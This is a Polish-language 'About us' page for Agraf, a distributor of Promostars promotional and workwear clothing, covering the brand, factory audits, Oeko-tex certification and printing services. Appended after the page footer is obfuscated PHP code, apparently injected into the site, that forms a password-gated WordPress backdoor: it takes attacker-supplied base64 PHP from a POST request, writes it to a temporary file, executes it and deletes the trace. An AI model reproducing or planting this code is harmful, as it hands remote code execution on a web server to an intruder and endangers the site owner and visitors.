Agraf dystrybutor marki Promostars
Wyjście

O firmie

Start » O firmie
Promostars

Firma Promostars jest jednym z wiodących producentów odzieży promocyjnej w Europie. Marka Promostars to odzież reklamowa w najlepszym wydaniu. Nasza oferta to proste, klasyczne fasony. Użyte materiały i staranne wykonanie zapewniają naszej odzieży trwałość i jakość, którą doceniło już wielu klientów. Szeroki asortyment oraz bogata kolorystyka to atuty zarówno dla branży odzieży reklamowej, jak i odzieży BHP. Nasza kompletna oferta przeznaczona jest do rozmaitych zastosowań: reklama, promocja, szkoła, praca, sport i odpoczynek. Odzież reklamowa wchodząca w skład oferty Promostars to między innymi t-shirty, koszulki polo, bluzy, polary, koszule, swetry, kurtki, bezrękawniki, a także torby, ręczniki i czapki. Kolekcja odzieży Promostars jest przystosowana do znakowania jej metodą sitodruku, termotransweru, DTG lub haftu komputerowego.

Kolejnym atutem produkowanej przez nasz odzieży jest, w niektórych modelach koszulek, możliwość zamówienia ich bez metek. Inne t-shirty natomiast mają metki odrywane. Pozwala to klientowi na bazie naszych sprawdzonych modeli budować własną markę, stworzyć wyjątkowy produkt dla swojej firmy.


Kontrola jakościJuż od 20 lat w sposób odpowiedzialny dostarczamy wysokiej jakości, bezpieczne i funkcjonalne produkty. Nasz kodeks postępowania dotyczy wszystkich współpracujących z nami fabryk. Ma on na celu zapewnienie odpowiednich warunków, higieny i bezpieczeństwa pracy. Fabryki audytowane są przez organizacje SEDEX i BSCI w zakresie etycznego postępowania i warunków pracy. Obie organizacje są niezależnymi instytucjami wyznaczającymi standardy kontroli warunków pracy w fabrykach. Duża część naszej odzieży produkowana jest w zakładach posiadających prestiżowy certyfikat Worldwide Responsible Accredited Production (WRAP). Jest to największy na świecie niezależny program certyfikacji fabryk, głównie koncentrujący się na odzieży, obuwiu i wyrobach szytych.

 

standard Oeko-texSzeroki wybór naszego asortymentu oferujemy z certyfikatem Oeko-tex. Produkty z tym znakiem, wolne są od substancji szkodliwych mających negatywny wpływ na stan zdrowia człowieka.

Poza naszą główną marką Promostars, w portfolio znajdą Państwo również markę premium Crimson Cut, odzież roboczą BHP Mark the Helper, oraz markę odzieży ekonomicznej Geffer.

Agraf – dystrybutor marki Promostars

Firma AGRAF istnieje od 1995 roku. Od 2000 roku sprzedajemy hurtowo odzież reklamową  PROMOSTARS. Nasz magazyn odzieży PROMOSTARS znajduje się w Olsztynie. Ta długoletnia współpraca pozwoliła nam nabyć doświadczenie w zakresie odzieży promocyjnej, potrzeb poszczególnych grup klientów, tendencji na rynku oraz znajomości marek konkurencyjnych. Od samego początku mamy studio graficzne posiadające duże doświadczenie w projektowania na potrzeby znakowania odzieży reklamowej i promocyjnej. Ponadto mamy wieloletnie doświadczenie w technice nadruku sitodrukiem, hafcie komputerowym, czy termotransferem. Nasze zamiłowanie do projektowania t-shirtów, koszulek polo, polarów, kurtek, czy czapek zaowocowało stworzeniem produktu „zrób koszulkę na imprezę”. Zainspirowaliśmy się naszymi pracami wykonywanymi przez wiele lat, które jak mamy nadzieję pokazały, że koszulka to nie tylko odzież, ale to przesłanie, to podkreślenie indywidualności użytkownika, to poczucie wspólnoty np. na Rajdzie Syren i Warszaw, Olsztyńskim Rajdzie Motocykli Zabytkowych Rotor, wyprawach wędkarskich do Mongolii, Szwecji, Rosji, wyprawach nurkowych, pielgrzymkach, juwenaliach (Kortowiada), spływach kajakowych, koncertach. Sprzedaż hurtową prowadzimy przez nasz sklep internetowy.

Agraf zespół

Poza standardowym znakowaniem możemy również wykonać i  wszyć metki, czy wszywki z logo, które dodatkowo wyróżnią  odzież firmową. Poznacie nas po naszym firmowym aucie Warszawce Agrafce – FSO Warszawa 223 z 1973 roku. Mimo tak wielu lat, auto dzielnie nam służy w codziennej pracy.

Warszawka Agrafka

Maszy pytania?
Odpowiemy tak szybko jak jest to możliwe
Nasza Oferta
Koszulki, polo, bluzy/spodnie, koszule/swetry, polary, czapki, kurtki, bezrękawniki

Odzież reklamowo-robocza

promostars, crimsoncut, geffer, mark the helper
Przewiń na górę if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}